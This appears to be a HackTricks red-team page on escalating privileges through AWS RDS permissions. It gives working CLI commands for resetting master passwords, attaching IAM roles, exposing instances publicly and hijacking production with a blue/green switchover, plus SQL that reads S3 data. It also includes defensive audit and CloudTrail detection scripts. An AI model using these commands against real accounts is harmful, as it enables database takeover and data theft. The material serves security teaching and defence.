AWS - RDS Privesc

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

RDS - Relational Database Service

For more information about RDS check:

AWS - Relational Database (RDS) Enum

rds:ModifyDBInstance

With that permission an attacker can change the password of the master user and log in to the database:

```bash
# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>
```

Warning

You will need to be able to reach the database (usually they are only reachable from inside internal networks).

Potential Impact: Finding sensitive information inside the databases.

rds-db:connect

According to the docs, a user with this permission can connect to the DB instance.

Abusing RDS IAM Role permissions

Postgresql (Aurora)

Tip

If you run SELECT datname FROM pg_database; and find a database called rdsadmin, you know you are inside an AWS PostgreSQL database.

First, you can check whether this database has been used to access any other AWS service. You can check this by looking at the installed extensions:

```sql
SELECT * FROM pg_extension;
```

If you find something like aws_s3 you can assume this database has some kind of access to S3 (there are other extensions such as aws_ml and aws_lambda).

Also, if you have permissions to run aws rds describe-db-clusters you can see there whether the cluster has any IAM Role attached, in the AssociatedRoles field. If it does, you can assume the database was prepared to access other AWS services. Based on the name of the role (or if you can read the role's permissions) you can guess what extra access the database has.

Now, to read a file inside a bucket you need to know its full path. You can read it with:

```sql
-- Create table
CREATE TABLE ttemp (col TEXT);

-- Create s3 uri (psql: \gset stores the result in the variable s3_uri)
SELECT aws_commons.create_s3_uri(
'test1234567890678', -- Name of the bucket
'data.csv',          -- Name of the file
'eu-west-1'          -- Region of the bucket
) AS s3_uri \gset

-- Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)', :'s3_uri');

-- Get info
SELECT * FROM ttemp;

-- Delete table
DROP TABLE ttemp;
```

If you had raw AWS credentials, you could also use them to access the S3 data with:

```sql
SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);
```

Note

PostgreSQL does not need any parameter group variable to be changed in order to access S3.

Mysql (Aurora)

Tip

Inside mysql, if you run the query SELECT User, Host FROM mysql.user; and there is a user called rdsadmin, you can assume you are inside an AWS RDS MySQL db.

Inside mysql run show variables; and if variables such as aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role have values, you can assume the database was prepared to access S3 data.

Also, if you have permissions to run aws rds describe-db-clusters you can check whether the cluster has an associated role, which usually means access to AWS services.

Now, to read a file inside a bucket you need to know its full path. You can read it with:

```sql
CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;
```
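The AssociatedRoles and public-exposure checks described in the PostgreSQL and MySQL sections above, turned into an offline audit over the JSON that `aws rds describe-db-clusters` and `aws rds describe-db-instances` print. This is an added example, not HackTricks code; the sample JSON, role ARNs and identifiers are constructed, and the Aurora PostgreSQL FeatureName values are an assumption.

```python
import json

# Added audit example (not HackTricks code): parse the JSON that `aws rds describe-db-clusters` and
# `aws rds describe-db-instances` print and flag the two conditions this page looks for, a cluster
# with an IAM role in AssociatedRoles and an instance that is PubliclyAccessible.
# The FeatureName values are those Aurora PostgreSQL uses for its integrations (an assumption here;
# Aurora MySQL attaches the role with no FeatureName and also names it in the parameter group).
FEATURE_HINTS = {"s3Import": "can read from S3", "s3Export": "can write to S3",
                 "Lambda": "can invoke Lambda", "": "default role (MySQL: check aws_default_s3_role etc.)"}

def audit_clusters(clusters_json):
    """Return (cluster id, role ARN, what the role lets the engine reach) for every active role."""
    out = []
    for c in json.loads(clusters_json).get("DBClusters", []):
        for r in c.get("AssociatedRoles", []):
            if r.get("Status", "ACTIVE") != "ACTIVE":
                continue                    # PENDING/INVALID roles are not usable by the engine yet
            feat = r.get("FeatureName", "")
            out.append((c["DBClusterIdentifier"], r["RoleArn"], FEATURE_HINTS.get(feat, feat)))
    return out

def audit_instances(instances_json):
    """Return (instance id, endpoint) for every instance exposed with PubliclyAccessible=true."""
    return [(i["DBInstanceIdentifier"], i.get("Endpoint", {}).get("Address"))
            for i in json.loads(instances_json).get("DBInstances", []) if i.get("PubliclyAccessible")]

# Constructed sample output, shaped like the AWS CLI's but with made-up identifiers.
CLUSTERS = """{"DBClusters":[
 {"DBClusterIdentifier":"database-1","Engine":"aurora-postgresql","AssociatedRoles":[
   {"RoleArn":"arn:aws:iam::111122223333:role/rds-s3-import","Status":"ACTIVE","FeatureName":"s3Import"},
   {"RoleArn":"arn:aws:iam::111122223333:role/rds-lambda","Status":"PENDING","FeatureName":"Lambda"}]},
 {"DBClusterIdentifier":"database-2","Engine":"aurora-mysql","AssociatedRoles":[
   {"RoleArn":"arn:aws:iam::111122223333:role/aurora-s3","Status":"ACTIVE"}]},
 {"DBClusterIdentifier":"database-3","Engine":"aurora-mysql","AssociatedRoles":[]}]}"""
INSTANCES = """{"DBInstances":[
 {"DBInstanceIdentifier":"mydbinstance1","PubliclyAccessible":false,
  "Endpoint":{"Address":"mydbinstance1.abc.eu-west-1.rds.amazonaws.com","Port":5432}},
 {"DBInstanceIdentifier":"mydbinstance2","PubliclyAccessible":true,
  "Endpoint":{"Address":"mydbinstance2.abc.eu-west-1.rds.amazonaws.com","Port":5432}}]}"""

if __name__ == "__main__":
    for cluster, role, reach in audit_clusters(CLUSTERS):
        print(f"[role] {cluster}: {role} ({reach})")
    for inst, addr in audit_instances(INSTANCES):
        print(f"[public] {inst}: {addr}")
```

Pipe real CLI output into the two functions to get the same report for an account; a PENDING role is skipped because the engine cannot use it yet.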

rds:AddRoleToDBCluster, iam:PassRole

An attacker with the rds:AddRoleToDBCluster and iam:PassRole permissions can add a specified role to an existing RDS instance. This could allow the attacker to access sensitive data or modify data inside the RDS instance.

```bash
aws rds add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>
```

Potential Impact: Access to sensitive data or unauthorized changes to data in the RDS instance.
Note that some DBs need extra configuration, such as MySQL, which also requires the role ARN to be specified in the parameter groups.

rds:CreateDBInstance

With only this permission an attacker can create a new instance inside an already existing cluster that has an IAM role attached. The attacker won't be able to change the master user's password, but they can expose the new database instance to the internet:

```bash
aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible
```

rds:CreateDBInstance, iam:PassRole

Note

TODO: Test

An attacker with the rds:CreateDBInstance and iam:PassRole permissions can create a new RDS instance with the specified role attached. The attacker could then potentially access sensitive data or modify data inside the instance.

Warning

Some requirements of the role/instance-profile to attach (from here):

  • The profile must exist in your account.
  • The profile must have an IAM role that Amazon EC2 has permissions to assume.
  • The instance profile name and the associated IAM role name must start with the prefix AWSRDSCustom.

```bash
aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vpc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole
```

Potential Impact: Access to sensitive information or unauthorized changes to data in the RDS instance.

rds:AddRoleToDBInstance, iam:PassRole

An attacker with the rds:AddRoleToDBInstance and iam:PassRole permissions can add a specified role to an existing RDS instance. This could allow the attacker to access sensitive information or modify data inside the RDS instance.

Warning

The DB instance must be outside a cluster for this.

```bash
aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>
```

Potential Impact: Access to sensitive data or unauthorized changes to data in the RDS instance.

rds:CreateBlueGreenDeployment, rds:AddRoleToDBCluster, iam:PassRole, rds:SwitchoverBlueGreenDeployment

An attacker with these permissions can clone the production database (Blue), attach a high-privilege IAM role to the clone (Green), and then use the switchover to replace the production environment. This gives the attacker elevated database privileges and unauthorized access to other AWS resources.

```bash
# Create a Green deployment (clone) of the production cluster
aws rds create-blue-green-deployment \
--blue-green-deployment-name <name> \
--source <production-db-cluster-arn>

# Attach a high-privilege IAM role to the Green cluster
aws rds add-role-to-db-cluster \
--db-cluster-identifier <green-cluster-id> \
--role-arn <high-privilege-iam-role-arn>

# Switch the Green environment to Production
aws rds switchover-blue-green-deployment \
--blue-green-deployment-identifier <deployment-id>
```

Potential Impact: Full takeover of the production database environment. After the switchover, the database runs with elevated permissions, allowing unauthorized access to other AWS services (e.g. S3, Lambda, Secrets Manager) from inside the database.
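A detection-side counterpart to the API calls listed on this page (ModifyDBInstance password resets, AddRoleToDBCluster/AddRoleToDBInstance, CreateDBInstance or ModifyDBInstance with public access, and the blue/green deployment calls), as an added example that is not HackTricks code. It assumes CloudTrail's request-parameter naming for RDS (dBInstanceIdentifier, dBClusterIdentifier, roleArn, publiclyAccessible, masterUserPassword); the sample records are constructed.

```python
# Added detection example (not HackTricks code): flag CloudTrail records for the RDS API calls this
# page abuses. Request-parameter names follow CloudTrail's RDS convention (an assumption); samples are constructed.
ROLE_ATTACH = {"AddRoleToDBCluster", "AddRoleToDBInstance"}
BLUE_GREEN = {"CreateBlueGreenDeployment", "SwitchoverBlueGreenDeployment"}

def classify_event(ev):
    """Return a short finding for a successful RDS call matching a privesc pattern, else None."""
    if ev.get("eventSource") != "rds.amazonaws.com" or ev.get("errorCode"):
        return None                                # non-RDS, or the call was denied/failed
    name, p = ev.get("eventName", ""), ev.get("requestParameters") or {}
    target = p.get("dBInstanceIdentifier") or p.get("dBClusterIdentifier")
    if name in ROLE_ATTACH:
        return f"{name}: role {p.get('roleArn')} attached to {target}"
    if name in BLUE_GREEN:
        return f"{name}: blue/green deployment created or switched over"
    if name == "ModifyDBInstance" and "masterUserPassword" in p:
        return f"ModifyDBInstance: master password reset on {target}"
    if name in ("ModifyDBInstance", "CreateDBInstance") and p.get("publiclyAccessible") is True:
        return f"{name}: {target} exposed with publiclyAccessible=true"
    return None

def scan_trail(records):
    """Return (eventTime, caller ARN, finding) for every matching record, in log order."""
    out = []
    for ev in records:
        finding = classify_event(ev)
        if finding:
            out.append((ev["eventTime"], ev["userIdentity"]["arn"], finding))
    return out
# Constructed sample records (not real logs); CloudTrail redacts the password value as "****".
_WHO = {"arn": "arn:aws:iam::111122223333:user/dev"}
SAMPLE_TRAIL = [
    {"eventTime": "2024-01-01T10:01:00Z", "eventSource": "rds.amazonaws.com", "userIdentity": _WHO,
     "eventName": "ModifyDBInstance",
     "requestParameters": {"dBInstanceIdentifier": "prod-db", "masterUserPassword": "****", "applyImmediately": True}},
    {"eventTime": "2024-01-01T10:02:00Z", "eventSource": "rds.amazonaws.com", "userIdentity": _WHO,
     "eventName": "AddRoleToDBCluster",
     "requestParameters": {"dBClusterIdentifier": "database-1", "roleArn": "arn:aws:iam::111122223333:role/S3Full"}},
    {"eventTime": "2024-01-01T10:03:00Z", "eventSource": "rds.amazonaws.com", "userIdentity": _WHO,
     "eventName": "AddRoleToDBInstance", "errorCode": "AccessDenied",
     "requestParameters": {"dBInstanceIdentifier": "prod-db", "roleArn": "arn:aws:iam::111122223333:role/S3Full"}},
    {"eventTime": "2024-01-01T10:04:00Z", "eventSource": "rds.amazonaws.com", "userIdentity": _WHO,
     "eventName": "CreateDBInstance", "requestParameters": {"dBInstanceIdentifier": "mydbinstance2",
     "dBClusterIdentifier": "database-1", "publiclyAccessible": True}},
]

if __name__ == "__main__":
    for when, who, what in scan_trail(SAMPLE_TRAIL):
        print(when, who, what)
```

Denied calls are deliberately skipped here; alert on them separately if you want to see the attempts as well as the successes.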
